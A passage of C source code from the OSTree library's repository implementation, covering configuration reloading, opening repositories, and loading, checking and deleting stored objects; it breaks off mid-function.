self->min_free_space_mb = 0; } if (self->min_free_space_percent != 0 && self->min_free_space_mb != 0) { self->min_free_space_percent = 0; g_debug ("Both min-free-space-percent and -size are mentioned in config. Enforcing min-free-space-size check only."); } } if (!_ostree_repo_parse_fsverity_config (self, error)) return FALSE; { g_clear_pointer (&self->collection_id, g_free); if (!ot_keyfile_get_value_with_default (self->config, "core", "collection-id", NULL, &self->collection_id, NULL)) return FALSE; } if (!ot_keyfile_get_value_with_default (self->config, "core", "parent", NULL, &parent_repo_path, error)) return FALSE; if (parent_repo_path && parent_repo_path[0]) { g_autoptr(GFile) parent_repo_f = g_file_new_for_path (parent_repo_path); g_clear_object (&self->parent_repo); self->parent_repo = ostree_repo_new (parent_repo_f); if (!ostree_repo_open (self->parent_repo, cancellable, error)) { g_prefix_error (error, "While checking parent repository '%s': ", gs_file_get_path_cached (parent_repo_f)); return FALSE; } } /* By default, only add remotes in a remotes config directory for * system repos. This is to preserve legacy behavior for non-system * repos that specify a remotes config dir (flatpak). */ { gboolean is_system = ostree_repo_is_system (self); if (!ot_keyfile_get_boolean_with_default (self->config, "core", "add-remotes-config-dir", is_system, &self->add_remotes_config_dir, error)) return FALSE; } { g_autofree char *payload_threshold = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "payload-link-threshold", "-1", &payload_threshold, error)) return FALSE; self->payload_link_threshold = g_ascii_strtoull (payload_threshold, NULL, 10); } { g_auto(GStrv) configured_finders = NULL; g_autoptr(GError) local_error = NULL; configured_finders = g_key_file_get_string_list (self->config, "core", "default-repo-finders", NULL, &local_error); if (g_error_matches (local_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) g_clear_error (&local_error); else if (local_error != NULL) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } if (configured_finders != NULL && *configured_finders == NULL) return glnx_throw (error, "Invalid empty default-repo-finders configuration"); for (char **iter = configured_finders; iter && *iter; iter++) { const char *repo_finder = *iter; if (strcmp (repo_finder, "config") != 0 && strcmp (repo_finder, "lan") != 0 && strcmp (repo_finder, "mount") != 0) return glnx_throw (error, "Invalid configured repo-finder '%s'", repo_finder); } /* Fall back to a default set of finders */ if (configured_finders == NULL) configured_finders = g_strsplit ("config;mount", ";", -1); g_clear_pointer (&self->repo_finders, g_strfreev); self->repo_finders = g_steal_pointer (&configured_finders); } return TRUE; } static gboolean reload_remote_config (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_mutex_lock (&self->remotes_lock); g_hash_table_remove_all (self->remotes); g_mutex_unlock (&self->remotes_lock); if (!add_remotes_from_keyfile (self, self->config, NULL, error)) return FALSE; g_autoptr(GFile) remotes_d = get_remotes_d_dir (self, NULL); if (remotes_d == NULL) return TRUE; g_autoptr(GFileEnumerator) direnum = NULL; if (!enumerate_directory_allow_noent (remotes_d, OSTREE_GIO_FAST_QUERYINFO, 0, &direnum, cancellable, error)) return FALSE; if (direnum) { while (TRUE) { GFileInfo *file_info; GFile *path; const char *name; guint32 type; if (!g_file_enumerator_iterate (direnum, &file_info, &path, NULL, error)) return FALSE; if (file_info == NULL) break; name = g_file_info_get_attribute_byte_string (file_info, "standard::name"); type = g_file_info_get_attribute_uint32 (file_info, "standard::type"); if (type == G_FILE_TYPE_REGULAR && g_str_has_suffix (name, ".conf")) { if (!append_one_remote_config (self, path, cancellable, error)) return FALSE; } } } return TRUE; } static gboolean reload_sysroot_config (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_autofree char *bootloader = NULL; if (!ot_keyfile_get_value_with_default_group_optional (self->config, "sysroot", "bootloader", "auto", &bootloader, error)) return FALSE; /* TODO: possibly later add support for specifying a generic bootloader * binary "x" in /usr/lib/ostree/bootloaders/x). See: * https://github.com/ostreedev/ostree/issues/1719 * https://github.com/ostreedev/ostree/issues/1801 */ for (int i = 0; CFG_SYSROOT_BOOTLOADER_OPTS_STR[i]; i++) { if (g_str_equal (bootloader, CFG_SYSROOT_BOOTLOADER_OPTS_STR[i])) { self->bootloader = (OstreeCfgSysrootBootloaderOpt) i; return TRUE; } } return glnx_throw (error, "Invalid bootloader configuration: '%s'", bootloader); } /** * ostree_repo_reload_config: * @self: repo * @cancellable: cancellable * @error: error * * By default, an #OstreeRepo will cache the remote configuration and its * own repo/config data. This API can be used to reload it. * * Since: 2017.2 */ gboolean ostree_repo_reload_config (OstreeRepo *self, GCancellable *cancellable, GError **error) { if (!reload_core_config (self, cancellable, error)) return FALSE; if (!reload_remote_config (self, cancellable, error)) return FALSE; if (!reload_sysroot_config (self, cancellable, error)) return FALSE; return TRUE; } gboolean ostree_repo_open (OstreeRepo *self, GCancellable *cancellable, GError **error) { GLNX_AUTO_PREFIX_ERROR ("opening repo", error); struct stat stbuf; g_return_val_if_fail (error == NULL || *error == NULL, FALSE); if (self->inited) return TRUE; /* We use a directory of the form `staging-${BOOT_ID}-${RANDOM}` * where if the ${BOOT_ID} doesn't match, we know file contents * possibly haven't been sync'd to disk and need to be discarded. */ { const char *env_bootid = getenv ("OSTREE_BOOTID"); g_autofree char *boot_id = NULL; if (env_bootid != NULL) boot_id = g_strdup (env_bootid); else { if (!g_file_get_contents ("/proc/sys/kernel/random/boot_id", &boot_id, NULL, error)) return FALSE; g_strdelimit (boot_id, "\n", '\0'); } self->stagedir_prefix = g_strconcat (OSTREE_REPO_TMPDIR_STAGING, boot_id, "-", NULL); } if (self->repo_dir_fd == -1) { g_assert (self->repodir); if (!glnx_opendirat (AT_FDCWD, gs_file_get_path_cached (self->repodir), TRUE, &self->repo_dir_fd, error)) return FALSE; } if (!glnx_fstat (self->repo_dir_fd, &stbuf, error)) return FALSE; self->device = stbuf.st_dev; self->inode = stbuf.st_ino; if (!glnx_opendirat (self->repo_dir_fd, "objects", TRUE, &self->objects_dir_fd, error)) return FALSE; self->writable = faccessat (self->objects_dir_fd, ".", W_OK, 0) == 0; if (!self->writable) { /* This is returned through ostree_repo_is_writable(). */ glnx_set_error_from_errno (&self->writable_error); /* Note - we don't return this error yet! */ } if (!glnx_fstat (self->objects_dir_fd, &stbuf, error)) return FALSE; self->owner_uid = stbuf.st_uid; if (self->writable) { /* Always try to recreate the tmpdir to be nice to people * who are looking to free up space. * * https://github.com/ostreedev/ostree/issues/1018 */ if (mkdirat (self->repo_dir_fd, "tmp", DEFAULT_DIRECTORY_MODE) == -1) { if (G_UNLIKELY (errno != EEXIST)) return glnx_throw_errno_prefix (error, "mkdir(tmp)"); } } if (!glnx_opendirat (self->repo_dir_fd, "tmp", TRUE, &self->tmp_dir_fd, error)) return FALSE; if (self->writable) { if (!glnx_shutil_mkdir_p_at (self->tmp_dir_fd, _OSTREE_CACHE_DIR, DEFAULT_DIRECTORY_MODE, cancellable, error)) return FALSE; if (!glnx_opendirat (self->tmp_dir_fd, _OSTREE_CACHE_DIR, TRUE, &self->cache_dir_fd, error)) return FALSE; } /* If we weren't created via ostree_sysroot_get_repo(), for backwards * compatibility we need to figure out now whether or not we refer to the * system repo. See also ostree-sysroot.c. */ if (self->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_UNKNOWN) { struct stat system_stbuf; /* Ignore any errors if we can't access /ostree/repo */ if (fstatat (AT_FDCWD, "/ostree/repo", &system_stbuf, 0) == 0) { /* Are we the same as /ostree/repo? */ if (self->device == system_stbuf.st_dev && self->inode == system_stbuf.st_ino) self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE; else self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_NO; } else self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_NO; } if (!ostree_repo_reload_config (self, cancellable, error)) return FALSE; self->inited = TRUE; return TRUE; } /** * ostree_repo_set_disable_fsync: * @self: An #OstreeRepo * @disable_fsync: If %TRUE, do not fsync * * Disable requests to fsync() to stable storage during commits. This * option should only be used by build system tools which are creating * disposable virtual machines, or have higher level mechanisms for * ensuring data consistency. */ void ostree_repo_set_disable_fsync (OstreeRepo *self, gboolean disable_fsync) { self->disable_fsync = disable_fsync; } /** * ostree_repo_set_cache_dir: * @self: An #OstreeRepo * @dfd: directory fd * @path: subpath in @dfd * @cancellable: a #GCancellable * @error: a #GError * * Set a custom location for the cache directory used for e.g. * per-remote summary caches. Setting this manually is useful when * doing operations on a system repo as a user because you don't have * write permissions in the repo, where the cache is normally stored. * * Since: 2016.5 */ gboolean ostree_repo_set_cache_dir (OstreeRepo *self, int dfd, const char *path, GCancellable *cancellable, GError **error) { glnx_autofd int fd = -1; if (!glnx_opendirat (dfd, path, TRUE, &fd, error)) return FALSE; glnx_close_fd (&self->cache_dir_fd); self->cache_dir_fd = glnx_steal_fd (&fd); return TRUE; } /** * ostree_repo_get_disable_fsync: * @self: An #OstreeRepo * * For more information see ostree_repo_set_disable_fsync(). * * Returns: Whether or not fsync() is enabled for this repo. */ gboolean ostree_repo_get_disable_fsync (OstreeRepo *self) { return self->disable_fsync; } /* Replace the contents of a file, honoring the repository's fsync * policy. */ gboolean _ostree_repo_file_replace_contents (OstreeRepo *self, int dfd, const char *path, const guint8 *buf, gsize len, GCancellable *cancellable, GError **error) { return glnx_file_replace_contents_at (dfd, path, buf, len, self->disable_fsync ? GLNX_FILE_REPLACE_NODATASYNC : GLNX_FILE_REPLACE_DATASYNC_NEW, cancellable, error); } /** * ostree_repo_get_path: * @self: Repo * * Note that since the introduction of ostree_repo_open_at(), this function may * return a process-specific path in `/proc` if the repository was created using * that API. In general, you should avoid use of this API. * * Returns: (transfer none): Path to repo */ GFile * ostree_repo_get_path (OstreeRepo *self) { /* Did we have an abspath? Return it */ if (self->repodir) return self->repodir; /* Lazily create a fd-relative path */ if (!self->repodir_fdrel) self->repodir_fdrel = ot_fdrel_to_gfile (self->repo_dir_fd, "."); return self->repodir_fdrel; } /** * ostree_repo_get_dfd: * @self: Repo * * In some cases it's useful for applications to access the repository * directly; for example, writing content into `repo/tmp` ensures it's * on the same filesystem. Another case is detecting the mtime on the * repository (to see whether a ref was written). * * Returns: File descriptor for repository root - owned by @self * Since: 2016.4 */ int ostree_repo_get_dfd (OstreeRepo *self) { g_return_val_if_fail (self->repo_dir_fd != -1, -1); return self->repo_dir_fd; } /** * ostree_repo_hash: * @self: an #OstreeRepo * * Calculate a hash value for the given open repository, suitable for use when * putting it into a hash table. It is an error to call this on an #OstreeRepo * which is not yet open, as a persistent hash value cannot be calculated until * the repository is open and the inode of its root directory has been loaded. * * This function does no I/O. * * Returns: hash value for the #OstreeRepo * Since: 2017.12 */ guint ostree_repo_hash (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), 0); /* We cannot hash non-open repositories, since their hash value would change * once they’re opened, resulting in false lookup misses and the inability to * remove them from a hash table. */ g_assert (self->repo_dir_fd >= 0); /* device and inode numbers are distributed fairly uniformly, so we can’t * do much better than just combining them. No need to rehash to even out * the distribution. */ return (self->device ^ self->inode); } /** * ostree_repo_equal: * @a: an #OstreeRepo * @b: an #OstreeRepo * * Check whether two opened repositories are the same on disk: if their root * directories are the same inode. If @a or @b are not open yet (due to * ostree_repo_open() not being called on them yet), %FALSE will be returned. * * Returns: %TRUE if @a and @b are the same repository on disk, %FALSE otherwise * Since: 2017.12 */ gboolean ostree_repo_equal (OstreeRepo *a, OstreeRepo *b) { g_return_val_if_fail (OSTREE_IS_REPO (a), FALSE); g_return_val_if_fail (OSTREE_IS_REPO (b), FALSE); if (a->repo_dir_fd < 0 || b->repo_dir_fd < 0) return FALSE; return (a->device == b->device && a->inode == b->inode); } OstreeRepoMode ostree_repo_get_mode (OstreeRepo *self) { g_return_val_if_fail (self->inited, FALSE); return self->mode; } /** * ostree_repo_get_min_free_space_bytes: * @self: Repo * @out_reserved_bytes: (out): Location to store the result * @error: Return location for a #GError * * Determine the number of bytes of free disk space that are reserved according * to the repo config and return that number in @out_reserved_bytes. See the * documentation for the core.min-free-space-size and * core.min-free-space-percent repo config options. * * Returns: %TRUE on success, %FALSE otherwise. * Since: 2018.9 */ gboolean ostree_repo_get_min_free_space_bytes (OstreeRepo *self, guint64 *out_reserved_bytes, GError **error) { g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (out_reserved_bytes != NULL, FALSE); g_return_val_if_fail (error == NULL || *error == NULL, FALSE); if (!min_free_space_calculate_reserved_bytes (self, out_reserved_bytes, error)) return glnx_prefix_error (error, "Error calculating min-free-space bytes"); return TRUE; } /** * ostree_repo_get_parent: * @self: Repo * * Before this function can be used, ostree_repo_init() must have been * called. * * Returns: (transfer none): Parent repository, or %NULL if none */ OstreeRepo * ostree_repo_get_parent (OstreeRepo *self) { return self->parent_repo; } static gboolean list_loose_objects_at (OstreeRepo *self, GHashTable *inout_objects, int dfd, const char *prefix, const char *commit_starting_with, GCancellable *cancellable, GError **error) { GVariant *key, *value; g_auto(GLnxDirFdIterator) dfd_iter = { 0, }; gboolean exists; if (!ot_dfd_iter_init_allow_noent (dfd, prefix, &dfd_iter, &exists, error)) return FALSE; /* Note early return */ if (!exists) return TRUE; while (TRUE) { struct dirent *dent; if (!glnx_dirfd_iterator_next_dent (&dfd_iter, &dent, cancellable, error)) return FALSE; if (dent == NULL) break; const char *name = dent->d_name; if (strcmp (name, ".") == 0 || strcmp (name, "..") == 0) continue; const char *dot = strrchr (name, '.'); if (!dot) continue; OstreeObjectType objtype; if ((self->mode == OSTREE_REPO_MODE_ARCHIVE && strcmp (dot, ".filez") == 0) || ((_ostree_repo_mode_is_bare (self->mode)) && strcmp (dot, ".file") == 0)) objtype = OSTREE_OBJECT_TYPE_FILE; else if (strcmp (dot, ".dirtree") == 0) objtype = OSTREE_OBJECT_TYPE_DIR_TREE; else if (strcmp (dot, ".dirmeta") == 0) objtype = OSTREE_OBJECT_TYPE_DIR_META; else if (strcmp (dot, ".commit") == 0) objtype = OSTREE_OBJECT_TYPE_COMMIT; else if (strcmp (dot, ".payload-link") == 0) objtype = OSTREE_OBJECT_TYPE_PAYLOAD_LINK; else continue; if ((dot - name) != 62) continue; char buf[OSTREE_SHA256_STRING_LEN+1]; memcpy (buf, prefix, 2); memcpy (buf + 2, name, 62); buf[sizeof(buf)-1] = '\0'; /* if we passed in a "starting with" argument, then we only want to return .commit objects with a checksum that matches the commit_starting_with argument */ if (commit_starting_with) { /* object is not a commit, do not add to array */ if (objtype != OSTREE_OBJECT_TYPE_COMMIT) continue; /* commit checksum does not match "starting with", do not add to array */ if (!g_str_has_prefix (buf, commit_starting_with)) continue; } key = ostree_object_name_serialize (buf, objtype); value = g_variant_new ("(b@as)", TRUE, g_variant_new_strv (NULL, 0)); /* transfer ownership */ g_hash_table_replace (inout_objects, g_variant_ref_sink (key), g_variant_ref_sink (value)); } return TRUE; } static gboolean list_loose_objects (OstreeRepo *self, GHashTable *inout_objects, const char *commit_starting_with, GCancellable *cancellable, GError **error) { static const gchar hexchars[] = "0123456789abcdef"; for (guint c = 0; c < 256; c++) { char buf[3]; buf[0] = hexchars[c >> 4]; buf[1] = hexchars[c & 0xF]; buf[2] = '\0'; if (!list_loose_objects_at (self, inout_objects, self->objects_dir_fd, buf, commit_starting_with, cancellable, error)) return FALSE; } return TRUE; } static gboolean load_metadata_internal (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, gboolean error_if_not_found, GVariant **out_variant, GInputStream **out_stream, guint64 *out_size, OstreeRepoCommitState *out_state, GCancellable *cancellable, GError **error) { char loose_path_buf[_OSTREE_LOOSE_PATH_MAX]; glnx_autofd int fd = -1; g_autoptr(GInputStream) ret_stream = NULL; g_autoptr(GVariant) ret_variant = NULL; g_return_val_if_fail (OSTREE_OBJECT_TYPE_IS_META (objtype), FALSE); g_return_val_if_fail (objtype == OSTREE_OBJECT_TYPE_COMMIT || out_state == NULL, FALSE); /* Special caching for dirmeta objects, since they're commonly referenced many * times. */ const gboolean is_dirmeta_cachable = (objtype == OSTREE_OBJECT_TYPE_DIR_META && out_variant && !out_stream); if (is_dirmeta_cachable) { GMutex *lock = &self->cache_lock; g_mutex_lock (lock); GVariant *cache_hit = NULL; /* Look it up, if we have a cache */ if (self->dirmeta_cache) cache_hit = g_hash_table_lookup (self->dirmeta_cache, sha256); if (cache_hit) *out_variant = g_variant_ref (cache_hit); g_mutex_unlock (lock); if (cache_hit) return TRUE; } _ostree_loose_path (loose_path_buf, sha256, objtype, self->mode); if (!ot_openat_ignore_enoent (self->objects_dir_fd, loose_path_buf, &fd, error)) return FALSE; if (fd < 0 && self->commit_stagedir.initialized) { if (!ot_openat_ignore_enoent (self->commit_stagedir.fd, loose_path_buf, &fd, error)) return FALSE; } if (fd != -1) { struct stat stbuf; if (!glnx_fstat (fd, &stbuf, error)) return FALSE; if (out_variant) { if (!ot_variant_read_fd (fd, 0, ostree_metadata_variant_type (objtype), TRUE, &ret_variant, error)) return FALSE; /* Now, let's put it in the cache */ if (is_dirmeta_cachable) { GMutex *lock = &self->cache_lock; g_mutex_lock (lock); if (self->dirmeta_cache) g_hash_table_replace (self->dirmeta_cache, g_strdup (sha256), g_variant_ref (ret_variant)); g_mutex_unlock (lock); } } else if (out_stream) { ret_stream = g_unix_input_stream_new (fd, TRUE); if (!ret_stream) return FALSE; fd = -1; /* Transfer ownership */ } if (out_size) *out_size = stbuf.st_size; if (out_state) { g_autofree char *commitpartial_path = _ostree_get_commitpartial_path (sha256); *out_state = 0; glnx_autofd int commitpartial_fd = -1; if (!ot_openat_ignore_enoent (self->repo_dir_fd, commitpartial_path, &commitpartial_fd, error)) return FALSE; if (commitpartial_fd != -1) { *out_state |= OSTREE_REPO_COMMIT_STATE_PARTIAL; char reason; if (read (commitpartial_fd, &reason, 1) == 1) { if (reason == 'f') *out_state |= OSTREE_REPO_COMMIT_STATE_FSCK_PARTIAL; } } } } else if (self->parent_repo) { /* Directly recurse to simplify out parameters */ return load_metadata_internal (self->parent_repo, objtype, sha256, error_if_not_found, out_variant, out_stream, out_size, out_state, cancellable, error); } else if (error_if_not_found) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "No such metadata object %s.%s", sha256, ostree_object_type_to_string (objtype)); return FALSE; } ot_transfer_out_value (out_variant, &ret_variant); ot_transfer_out_value (out_stream, &ret_stream); return TRUE; } static GVariant * filemeta_to_stat (struct stat *stbuf, GVariant *metadata) { guint32 uid, gid, mode; GVariant *xattrs; g_variant_get (metadata, "(uuu@a(ayay))", &uid, &gid, &mode, &xattrs); stbuf->st_uid = GUINT32_FROM_BE (uid); stbuf->st_gid = GUINT32_FROM_BE (gid); stbuf->st_mode = GUINT32_FROM_BE (mode); return xattrs; } static gboolean repo_load_file_archive (OstreeRepo *self, const char *checksum, GInputStream **out_input, GFileInfo **out_file_info, GVariant **out_xattrs, GCancellable *cancellable, GError **error) { struct stat stbuf; char loose_path_buf[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path_buf, checksum, OSTREE_OBJECT_TYPE_FILE, self->mode); glnx_autofd int fd = -1; if (!ot_openat_ignore_enoent (self->objects_dir_fd, loose_path_buf, &fd, error)) return FALSE; if (fd < 0 && self->commit_stagedir.initialized) { if (!ot_openat_ignore_enoent (self->commit_stagedir.fd, loose_path_buf, &fd, error)) return FALSE; } if (fd != -1) { if (!glnx_fstat (fd, &stbuf, error)) return FALSE; g_autoptr(GInputStream) tmp_stream = g_unix_input_stream_new (glnx_steal_fd (&fd), TRUE); /* Note return here */ return ostree_content_stream_parse (TRUE, tmp_stream, stbuf.st_size, TRUE, out_input, out_file_info, out_xattrs, cancellable, error); } else if (self->parent_repo) { return ostree_repo_load_file (self->parent_repo, checksum, out_input, out_file_info, out_xattrs, cancellable, error); } else { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "Couldn't find file object '%s'", checksum); return FALSE; } } gboolean _ostree_repo_load_file_bare (OstreeRepo *self, const char *checksum, int *out_fd, struct stat *out_stbuf, char **out_symlink, GVariant **out_xattrs, GCancellable *cancellable, GError **error) { /* The bottom case recursing on the parent repo */ if (self == NULL) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "Couldn't find file object '%s'", checksum); return FALSE; } const char *errprefix = glnx_strjoina ("Opening content object ", checksum); GLNX_AUTO_PREFIX_ERROR (errprefix, error); struct stat stbuf; glnx_autofd int fd = -1; g_autofree char *ret_symlink = NULL; g_autoptr(GVariant) ret_xattrs = NULL; char loose_path_buf[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path_buf, checksum, OSTREE_OBJECT_TYPE_FILE, self->mode); /* Do a fstatat() and find the object directory that contains this object */ int objdir_fd = self->objects_dir_fd; int res; if ((res = TEMP_FAILURE_RETRY (fstatat (objdir_fd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW))) < 0 && errno == ENOENT && self->commit_stagedir.initialized) { objdir_fd = self->commit_stagedir.fd; res = TEMP_FAILURE_RETRY (fstatat (objdir_fd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW)); } if (res < 0 && errno != ENOENT) return glnx_throw_errno_prefix (error, "fstat"); else if (res < 0) { g_assert (errno == ENOENT); return _ostree_repo_load_file_bare (self->parent_repo, checksum, out_fd, out_stbuf, out_symlink, out_xattrs, cancellable, error); } const gboolean need_open = (out_fd || out_xattrs || self->mode == OSTREE_REPO_MODE_BARE_USER); /* If it's a regular file and we're requested to return the fd, do it now. As * a special case in bare-user, we always do an open, since the stat() metadata * lives there. */ if (need_open && S_ISREG (stbuf.st_mode)) { fd = openat (objdir_fd, loose_path_buf, O_CLOEXEC | O_RDONLY); if (fd < 0) return glnx_throw_errno_prefix (error, "openat"); } if (!(S_ISREG (stbuf.st_mode) || S_ISLNK (stbuf.st_mode))) return glnx_throw (error, "Not a regular file or symlink"); /* In the non-bare-user case, gather symlink info if requested */ if (self->mode != OSTREE_REPO_MODE_BARE_USER && S_ISLNK (stbuf.st_mode) && out_symlink) { ret_symlink = glnx_readlinkat_malloc (objdir_fd, loose_path_buf, cancellable, error); if (!ret_symlink) return FALSE; } if (self->mode == OSTREE_REPO_MODE_BARE_USER) { g_autoptr(GBytes) bytes = glnx_fgetxattr_bytes (fd, "user.ostreemeta", error); if (bytes == NULL) return FALSE; g_autoptr(GVariant) metadata = g_variant_ref_sink (g_variant_new_from_bytes (OSTREE_FILEMETA_GVARIANT_FORMAT, bytes, FALSE)); ret_xattrs = filemeta_to_stat (&stbuf, metadata); if (S_ISLNK (stbuf.st_mode)) { if (out_symlink) { char targetbuf[PATH_MAX+1]; gsize target_size; g_autoptr(GInputStream) target_input = g_unix_input_stream_new (fd, FALSE); if (!g_input_stream_read_all (target_input, targetbuf, sizeof (targetbuf), &target_size, cancellable, error)) return FALSE; ret_symlink = g_strndup (targetbuf, target_size); } /* In the symlink case, we don't want to return the bare-user fd */ glnx_close_fd (&fd); } } else if (self->mode == OSTREE_REPO_MODE_BARE_USER_ONLY) { /* Canonical info is: uid/gid is 0 and no xattrs, which might be wrong and thus not validate correctly, but at least we report something consistent. */ stbuf.st_uid = stbuf.st_gid = 0; if (out_xattrs) { GVariantBuilder builder; g_variant_builder_init (&builder, G_VARIANT_TYPE ("a(ayay)")); ret_xattrs = g_variant_ref_sink (g_variant_builder_end (&builder)); } } else { g_assert (self->mode == OSTREE_REPO_MODE_BARE); if (S_ISREG (stbuf.st_mode) && out_xattrs) { if (self->disable_xattrs) ret_xattrs = g_variant_ref_sink (g_variant_new_array (G_VARIANT_TYPE ("(ayay)"), NULL, 0)); else if (!glnx_fd_get_all_xattrs (fd, &ret_xattrs, cancellable, error)) return FALSE; } else if (S_ISLNK (stbuf.st_mode) && out_xattrs) { if (self->disable_xattrs) ret_xattrs = g_variant_ref_sink (g_variant_new_array (G_VARIANT_TYPE ("(ayay)"), NULL, 0)); else if (!glnx_dfd_name_get_all_xattrs (objdir_fd, loose_path_buf, &ret_xattrs, cancellable, error)) return FALSE; } } if (out_fd) *out_fd = glnx_steal_fd (&fd); if (out_stbuf) *out_stbuf = stbuf; ot_transfer_out_value (out_symlink, &ret_symlink); ot_transfer_out_value (out_xattrs, &ret_xattrs); return TRUE; } /** * ostree_repo_load_file: * @self: Repo * @checksum: ASCII SHA256 checksum * @out_input: (out) (optional) (nullable): File content * @out_file_info: (out) (optional) (nullable): File information * @out_xattrs: (out) (optional) (nullable): Extended attributes * @cancellable: Cancellable * @error: Error * * Load content object, decomposing it into three parts: the actual * content (for regular files), the metadata, and extended attributes. */ gboolean ostree_repo_load_file (OstreeRepo *self, const char *checksum, GInputStream **out_input, GFileInfo **out_file_info, GVariant **out_xattrs, GCancellable *cancellable, GError **error) { if (self->mode == OSTREE_REPO_MODE_ARCHIVE) return repo_load_file_archive (self, checksum, out_input, out_file_info, out_xattrs, cancellable, error); else { glnx_autofd int fd = -1; struct stat stbuf; g_autofree char *symlink_target = NULL; g_autoptr(GVariant) ret_xattrs = NULL; if (!_ostree_repo_load_file_bare (self, checksum, out_input ? &fd : NULL, out_file_info ? &stbuf : NULL, out_file_info ? &symlink_target : NULL, out_xattrs ? &ret_xattrs : NULL, cancellable, error)) return FALSE; /* Convert fd → GInputStream and struct stat → GFileInfo */ if (out_input) { if (fd != -1) *out_input = g_unix_input_stream_new (glnx_steal_fd (&fd), TRUE); else *out_input = NULL; } if (out_file_info) { *out_file_info = _ostree_stbuf_to_gfileinfo (&stbuf); if (S_ISLNK (stbuf.st_mode)) g_file_info_set_symlink_target (*out_file_info, symlink_target); else g_assert (S_ISREG (stbuf.st_mode)); } ot_transfer_out_value (out_xattrs, &ret_xattrs); return TRUE; } } /** * ostree_repo_load_object_stream: * @self: Repo * @objtype: Object type * @checksum: ASCII SHA256 checksum * @out_input: (out): Stream for object * @out_size: (out): Length of @out_input * @cancellable: Cancellable * @error: Error * * Load object as a stream; useful when copying objects between * repositories. */ gboolean ostree_repo_load_object_stream (OstreeRepo *self, OstreeObjectType objtype, const char *checksum, GInputStream **out_input, guint64 *out_size, GCancellable *cancellable, GError **error) { guint64 size; g_autoptr(GInputStream) ret_input = NULL; if (OSTREE_OBJECT_TYPE_IS_META (objtype)) { if (!load_metadata_internal (self, objtype, checksum, TRUE, NULL, &ret_input, &size, NULL, cancellable, error)) return FALSE; } else { g_autoptr(GInputStream) input = NULL; g_autoptr(GFileInfo) finfo = NULL; g_autoptr(GVariant) xattrs = NULL; if (!ostree_repo_load_file (self, checksum, &input, &finfo, &xattrs, cancellable, error)) return FALSE; if (!ostree_raw_file_to_content_stream (input, finfo, xattrs, &ret_input, &size, cancellable, error)) return FALSE; } ot_transfer_out_value (out_input, &ret_input); *out_size = size; return TRUE; } /* * _ostree_repo_has_loose_object: * @loose_path_buf: Buffer of size _OSTREE_LOOSE_PATH_MAX * * Locate object in repository; if it exists, @out_is_stored will be * set to TRUE. @loose_path_buf is always set to the loose path. */ gboolean _ostree_repo_has_loose_object (OstreeRepo *self, const char *checksum, OstreeObjectType objtype, gboolean *out_is_stored, GCancellable *cancellable, GError **error) { char loose_path_buf[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path_buf, checksum, objtype, self->mode); gboolean found = FALSE; /* It's easier to share code if we make this an array */ int dfd_searches[] = { -1, self->objects_dir_fd }; if (self->commit_stagedir.initialized) dfd_searches[0] = self->commit_stagedir.fd; for (guint i = 0; i < G_N_ELEMENTS (dfd_searches); i++) { int dfd = dfd_searches[i]; if (dfd == -1) continue; struct stat stbuf; if (TEMP_FAILURE_RETRY (fstatat (dfd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW)) < 0) { if (errno == ENOENT) ; /* Next dfd */ else return glnx_throw_errno_prefix (error, "fstatat(%s)", loose_path_buf); } else { found = TRUE; break; } } *out_is_stored = found; return TRUE; } /** * ostree_repo_has_object: * @self: Repo * @objtype: Object type * @checksum: ASCII SHA256 checksum * @out_have_object: (out): %TRUE if repository contains object * @cancellable: Cancellable * @error: Error * * Set @out_have_object to %TRUE if @self contains the given object; * %FALSE otherwise. * * Returns: %FALSE if an unexpected error occurred, %TRUE otherwise */ gboolean ostree_repo_has_object (OstreeRepo *self, OstreeObjectType objtype, const char *checksum, gboolean *out_have_object, GCancellable *cancellable, GError **error) { gboolean ret_have_object = FALSE; if (!_ostree_repo_has_loose_object (self, checksum, objtype, &ret_have_object, cancellable, error)) return FALSE; /* In the future, here is where we would also look up in metadata pack files */ if (!ret_have_object && self->parent_repo) { if (!ostree_repo_has_object (self->parent_repo, objtype, checksum, &ret_have_object, cancellable, error)) return FALSE; } if (out_have_object) *out_have_object = ret_have_object; return TRUE; } /** * ostree_repo_delete_object: * @self: Repo * @objtype: Object type * @sha256: Checksum * @cancellable: Cancellable * @error: Error * * Remove the object of type @objtype with checksum @sha256 * from the repository. An error of type %G_IO_ERROR_NOT_FOUND * is thrown if the object does not exist. */ gboolean ostree_repo_delete_object (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GCancellable *cancellable, GError **error) { char loose_path[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path, sha256, objtype, self->mode); if (objtype == OSTREE_OBJECT_TYPE_COMMIT) { char meta_loose[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (meta_loose, sha256, OSTREE_OBJECT_TYPE_COMMIT_META, self->mode); if (!ot_ensure_unlinked_at (self->objects_dir_fd, meta_loose, error)) return FALSE; } if (!glnx_unlinkat (self->objects_dir_fd, loose_path, 0, error)) return glnx_prefix_error (error, "Deleting object %s.%s", sha256, ostree_object_type_to_string (objtype)); /* If the repository is configured to use tombstone commits, create one when deleting a commit. */ if (objtype == OSTREE_OBJECT_TYPE_COMMIT) { gboolean tombstone_commits = FALSE; GKeyFile *readonly_config = ostree_repo_get_config (self); if (!ot_keyfile_get_boolean_with_default (readonly_config, "core", 